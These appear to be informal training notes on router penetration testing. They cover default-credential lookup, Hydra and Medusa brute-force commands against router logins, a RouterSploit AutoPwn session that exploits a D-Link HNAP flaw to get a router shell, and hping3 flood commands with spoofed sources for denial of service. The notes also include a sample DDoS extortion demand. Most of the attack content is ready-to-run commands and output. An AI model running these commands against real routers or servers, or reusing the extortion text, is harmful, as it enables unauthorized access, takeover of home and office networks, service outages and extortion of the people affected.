Title: router_pentestingAuthor: unknowndevice64
Router Pentesting
Web Applications
Web Sites

Three Different Types of scenario
1. People purchase routers and do not change the interface's credentials
Default Username
Default Passwords

1. Physical Access Of The Router
It is sticked at the bottom of my router
2. I can use open source web sites for getting default Credentials
Router is of which company
#route -n ---> it will tell me the default gateway
I will enter that IP Address in the browser

2. When people become little smart, They change the router's credentials
We know, sometimes the username of the router but the default password is still unkonwn to us.

Brute Force
1. Hydra
2. Medussa

1. Hydra -->
One of the best tool which can be used for performing the brute force attack over different different services and protocols.
The protocol which requires the authentication (user id|PASSWORD)

I know that
username --> Admin
password --> ?
i will tell hydra that the username is Admin
password --> brute force

#hydra -l Admin -P /usr/share/wordlists/rockyou.txt http-get
16 valid entries, among which one of them will be my password.

2. Medussa
I am faster and more reliable then Hydra,I work in a parallel way and can process more passwords as compare to Hydra.
I give more accurate credentials --> exactly one username and password
Hydra supports a limited amount of modules, but medussa supports a huge variety of modules
modules ---> Protocols

#medusa -h -u Admin -P /usr/share/wordlists/rockyou.txt -e n -M http

success message ---> Username:Admin Password: **********

3. Those who are very very smart, and they change the username and password both.

1. Hydra -L /usr/share/wordlists/rockyou.txt
2. Medusa -U /usr/share/wordlists/rockyou.txt

Router Exploitation Framework ---> routersploit framework
google --> routersploit framework github
click on "Download or clone" --> copy the link
Open the terminal
#git clone https://github.com/reverse-shell/routersploit.git
Routersploit will download in your linux Operating system
#cd routersploit
#ls ---> rsf.py --> executable file

root@kali:~/tools/routersploit# ./rsf.py
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
| // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
| |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_
\_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__|
| |
IoT Exploitation Framework |_|

Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
Codename : Bad Blood
Version : 2.2.1

Exploits: 123 Scanners: 32 Creds: 13 Payloads: 10

rsf >

rsf > help
Global commands:
help Print this help menu
use <module> Select a module for usage
exec <shell command> <args> Execute a command in a shell
search <search term> Search for appropriate module
exit Exit RouterSploit
rsf > use
creds exploits payloads scanners
rsf > use scanners/
scanners/2wire_scan scanners/cameras_scan scanners/juniper_scan scanners/routers_scan
scanners/3com_scan scanners/cisco_scan scanners/linksys_scan scanners/shuttle_scan
scanners/asmax_scan scanners/comtrend_scan scanners/misc_scan scanners/technicolor_scan
scanners/asus_scan scanners/dlink_scan scanners/movistar_scan scanners/thomson_scan
scanners/autopwn scanners/fortinet_scan scanners/multi_scan scanners/tplink_scan
scanners/belkin_scan scanners/grandstream_scan scanners/netcore_scan scanners/ubiquiti_scan
scanners/bhu_scan scanners/huawei_scan scanners/netgear_scan scanners/zte_scan
scanners/billion_scan scanners/ipfire_scan scanners/netsys_scan scanners/zyxel_scan
rsf > use scanners/autopwn

rsf (AutoPwn) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target Target IP address e.g.
port 80 Target port

Module options:

Name Current settings Description
---- ---------------- -----------
threads 8 Number of threads

rsf (AutoPwn) > set target
[+] {'target': ''}
rsf (AutoPwn) >
back check exec exit help run search set setg show use
rsf (AutoPwn) > run

[*] Could not verify exploitability: --> blue
- exploits/routers/billion/5200w_rce
- exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
- exploits/routers/dlink/dsl_2640b_dns_change
- exploits/routers/dlink/dsl_2740r_dns_change
- exploits/routers/dlink/dir_815_850l_rce
- exploits/routers/shuttle/915wm_dns_change
- exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
- exploits/routers/cisco/secure_acs_bypass
- exploits/routers/cisco/catalyst_2960_rocem

[+] Device is vulnerable: --> green
- exploits/routers/dlink/multi_hnap_rce

rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
rsf (D-Link Multi HNAP RCE) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target Target address e.g.
port 80 Target Port

rsf (D-Link Multi HNAP RCE) > set target
[+] {'target': ''}
rsf (D-Link Multi HNAP RCE) > run

cmd> --> shell of the router

Organisation ----> cisco routers
MS --> Windows
Linux --> Red Hat|fedora|Ubuntu
Router --> IOS
IOS --> Interconnection Operating system

Cisco Packet Tracer ---> simulator for Routers and Switched (Network Administrator CCNA)

Harms which can be caused by router's shell
Implant Backdoor
Port Forwarding
Authentication Canging
Block MAD Addresses --> MAC Filtering
Network Traffic Monitoring

DoS Attack
It is the type of attack in which a single user sends multiple request to a host. In other words, a user create a huge amount of traffic of the host server. It may lead to crashing of the system. Which further leads to system faliure or make the system down for some time.

www.amazon.com ---> i deployed a DoS attack ----> which means, the server will start getting slow.
User will get frustate and will go and purchase items from other competetors of amazon.

Hello Sir,
I am having a botnet of 10,000 devices. Please, it is a humble request to you that, pay me $50,000 USD or else I will deploy a DoS|DDoS Attack on your server.
Bitcoin account number ----> ************
With Love

Hello Attacker,
Please do not deploy any kind of such attack. We are ready to pay you the specific ammount of money ASAP.

Size --> greater that xxx
Data is coming from single IP Address
It is continuously sending the traffic
Block that IP Address

DDoS --> Distributed Deniel Of Service
It is kind of DoS attack, in which there are many machines, who will send the data from their devices to the target machine.

Network tool. WHich is used for
Testing firewall
Testing TCP/IP connection
Testing IDS and IPS
Used for scanning the open ports
It is also used for generating traffic over the network

hping3 --flood --rand-source -c 500000 -d 12000 -p 8080
hping3 --> tool --> target IP Address
--flood --> to send packets continuously
--rand-source --> to give the source IP Address as random source
-c --> count --< how many packets we do need to send
-d --> size ---> size of one packet
-p --> port number

hping3 --flood --rand-source -c 500000 -d 12000 -p 443

There are 4 different type of authentication
1. Basic Authentication
2. Integrated Authentication
3. Digest Authentication
4. Form Based Authentication
Task --> to implement the medusa on your router

Submitted On: 2019-05-18 20:31:16